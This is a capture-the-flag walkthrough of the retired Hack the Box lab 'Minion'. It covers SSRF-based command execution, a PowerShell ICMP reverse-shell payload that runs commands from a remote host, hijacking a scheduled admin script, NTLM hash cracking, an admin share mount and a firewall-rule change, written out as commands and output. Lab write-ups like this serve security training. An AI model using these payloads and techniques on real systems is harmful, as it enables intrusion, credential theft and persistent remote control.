Today we are going to solve another CTF challenge “Minion” which is available online for those who want to increase their skill in penetration testing and black box testing. Minion is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of Minion is 10.10.10.57 so let’s begin with nmap port enumeration.
root@kali:~/htb/minion# nmap -sV -p- 10.10.10.57 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-31 15:44 CET Nmap scan report for 10.10.10.57 Host is up (0.027s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 62696/tcp open http Microsoft IIS httpd 8.5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 842.77 seconds
We don’t find anything on the webpage, so we run dirb to enumerate the directories. As the target machine is running Microsoft IIS server we try to find .asp file.
root@kali:~/htb/minion# dirb http://10.10.10.57:62696 -X .asp ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Jan 31 16:10:15 2019 URL_BASE: http://10.10.10.57:62696/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.asp) | (.asp) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.57:62696/ ---- + http://10.10.10.57:62696/test.asp (CODE:200|SIZE:41) ----------------- END_TIME: Thu Jan 31 16:12:29 2019 DOWNLOADED: 4612 - FOUND: 1
After enumerating this system, we find that this page is vulnerable to SSRF. So when we try access localhost we find a link called system commands.
As we are not directly accessing the page, we take a look at the source code and find the link to system command.
We open it using SSRF and find a form that can be used to execute our commands.
When we try to execute a command we are unable to. So we take a look at the source code of the page and find the parameter that is being used to pass the command we type.
After finding the parameter we use it pass our command and we find that we only get a response in terms of Exit Status. Exit Status = 1 for successful and Exit Status = 0 in case of errors.
Now when we try to get a reverse shell we are unable to, it is possible that TCP and UDP packets are blocked. So we ping ourselves using this RCE vulnerability to check if ICMP packet is allowed.
Hmmmm… The method is POST and the parameter is named “xcmd”. Nevertheless, let’s make an experiment. We are going to use the GET method and pass the xcmd parameter via the URL. We will set the xcmd = ping 10.10.14.15:
On our side, let’s see if we capture any pings coming from MINION (10.10.10.57):
Getting shell
It’s time for us to get a shell. On our side we can run icmpsh_m.py from https://github.com/inquisb/icmpsh and on MINION we can send this payload: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
The problem is that if we try to send this payload via the xcmd paremeter some symbols are getting filtered (“+”, “&”, “/”) and there is also a size limit. We can double url-encode the special symbols to pass them through. We can also use multiple “echo >>” commands to write a ps1 script file and indeed many guys followed that path. But Alamot wrote his -very compact- one-liner payload without using any “+”,”&” symbols:
$ip = 'LHOST'; $id = 'UNIQUEID'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment=$true; function s($b) { $ic.Send($ip,5000,([text.encoding]::ASCII).GetBytes($b),$po) }; function p { -join($id,'[P$] ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') }; while ($true) { $r = s(p); if (!$r.Buffer) { continue; }; $rs = ([text.encoding]::ASCII).GetString($r.Buffer); if ($rs.Substring(0,8) -ne $id) { exit }; try { $rt = (iex -Command $rs.Substring(8) | Out-String); } catch { $rt = ($_.Exception|out-string) }; $i=0; while ($i -lt $rt.length-110) { s(-join($id,$rt.Substring($i,110))); $i -= -110; }; s(-join($id,$rt.Substring($i))); }
You can see he did some tricks like using $i -= -110 instead of $i += 110 etc. Thescript has a feature of unique ids, because -when using the ICMP protocol- things can get quite messy if multiple payloads are running simultaneously. You can download his script from here: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Minion/icmp_alamot.py
Now, let’s get a shell (don’t forget to change LHOST inside the script):
root@kali:~/htb# python icmp_alamot.py Sending powershell ICMP payload [UID=84444eaf] and waiting for shell... [P$] iis apppool\defaultapppool@MINION inetsrv> dir c:\ Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 9/4/2017 7:42 PM accesslogs d---- 8/10/2017 10:43 AM inetpub d---- 8/22/2013 8:52 AM PerfLogs d-r-- 9/25/2017 1:51 AM Program Files d---- 8/10/2017 9:42 AM Program Files (x86) d---- 8/24/2017 1:28 AM sysadmscripts d---- 9/16/2017 2:41 AM temp d-r-- 9/4/2017 7:41 PM Users d---- 9/10/2017 10:20 AM Windows [P$] iis apppool\defaultapppool@MINION inetsrv>
The folder sysadmscripts seems interesting:
We go to root directory and find two files called “c.ps1” and “del_logs.bat”.
We take a look at the content of the file, and find that c.ps1 writes something inside a file that is passed as its argument. In “del_logs.bat” file it creates logs inside log.txt inside c:\windows\temp\ directory and find that the time is changed every 5 minutes.
Let’s examine the permissions in the sysadmscripts folder:
[P$] apppool\defaultapppool@MINION sysadmscripts> ls | get-acl | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\c.ps1
Owner : BUILTIN\Administrators
Group : MINION\None
Access : Everyone Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow FullControl
Audit :
Sddl : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;FA;;;WD)(A;
;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)
Path : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\del_logs.bat
Owner : BUILTIN\Administrators
Group : MINION\None
Access : Everyone Allow ReadAndExecute, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;0x1200a9;;;
WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)
User decoder runs the script c.ps1 every 5 minutes and we can overwrite it with our own payload.
Now we change the original c.ps1 with our file, so that we can try and get the user.txt and root.txt.
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\administrator\Desktop > c:\temp\output.txt" > c:\temp\test.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\decoder.MINION\Desktop >> c:\temp\output.txt" >> c:\temp\test.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\administrator\Desktop\root.txt c:\temp\root.txt" >> c:\temp\test.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\decoder.MINION\Desktop\* c:\temp\" >> c:\temp\test.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> (Get-Content c:\temp\test.ps1) | ForEach-Object { $_ -replace """", "" } | Set-Content c:\temp\test.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\sysadmscripts\c.ps1 c:\temp\c.ps1.bak [P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\temp\test.ps1 c:\sysadmscripts\c.ps1 [P$] iis apppool\defaultapppool@MINION sysadmscripts> cd c:\temp [P$] iis apppool\defaultapppool@MINION temp> dir Directory: C:\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 9/4/2017 7:19 PM 103297 backup.zip -a--- 9/26/2017 6:24 AM 284 c.ps1.bak -a--- 1/31/2019 6:01 AM 770 output.txt -a--- 1/31/2019 5:59 AM 228 test.ps1 -a--- 8/25/2017 11:09 AM 33 user.txt [P$] iis apppool\defaultapppool@MINION temp> type user.txt 40b******601 [P$] iis apppool\defaultapppool@MINION temp> get-content c:\temp\backup.zip -str pass 28a5d1e0c15af9f8fce7db65d75bbf17 -> We decode the NTLM hash using hashkiller.co.uk and find the password to be 1234test [P$] iis apppool\defaultapppool@MINION temp> net use * \\minion\c$ /user:minion\administrator 1234test Drive Z: is now connected to \\minion\c$. The command completed successfully. [P$] iis apppool\defaultapppool@MINION temp> z: [P$] iis apppool\defaultapppool@MINION Z:\> dir Directory: Z:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 9/4/2017 7:42 PM accesslogs d---- 8/10/2017 10:43 AM inetpub d---- 8/22/2013 8:52 AM PerfLogs d-r-- 9/25/2017 1:51 AM Program Files d---- 8/10/2017 9:42 AM Program Files (x86) d---- 8/24/2017 1:28 AM sysadmscripts d---- 1/31/2019 6:01 AM temp d-r-- 9/4/2017 7:41 PM Users d---- 9/10/2017 10:20 AM Windows [P$] iis apppool\defaultapppool@MINION Z:\> cd users [P$] iis apppool\defaultapppool@MINION users> cd administrator [P$] iis apppool\defaultapppool@MINION administrator> cd desktop [P$] iis apppool\defaultapppool@MINION desktop> Directory: Z:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 9/26/2017 6:18 AM 386479 root.exe -a--- 8/24/2017 12:32 AM 76 root.txt [P$] iis apppool\defaultapppool@MINION desktop> type root.txt In order to get the flag you have to launch root.exe located in this folder!
We wait for few minutes for the powershell script to get executed and find that we were able to successfully able to extract “user.txt”. Before looking in the zip backup file, we take a look at the content of “output.txt” and find that the file was in “c:\users\decoder.MINION\Desktop” directory.
c:\PENTEST\HASHCAT>hashcat32 -h | findstr NTLM 5500 | NetNTLMv1 | Network Protocols 5500 | NetNTLMv1+ESS | Network Protocols 5600 | NetNTLMv2 | Network Protocols 1000 | NTLM | Operating Systems c:\PENTEST\HASHCAT>hashcat32 -a0 -m 1000 28a5d1e0c15af9f8fce7db65d75bbf17 e:\oscp\rockyou.txt --force --show 28a5d1e0c15af9f8fce7db65d75bbf17:1234test
We try to run root.exe but are unable to get a flag because we are not Administrator yet.
[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw [P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {cd C:\Users\Administrator\Desktop\;C:\Users\Administrator\Desktop\root.exe} 25a*****cf1
Adding a firewall rule ( as Administrator )
[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw [P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {New-NetFirewallRule - DisplayName puckie -RemoteAddress 10.10.14.15 -Direction inbound -Action Allow}
Author: Puckiestyle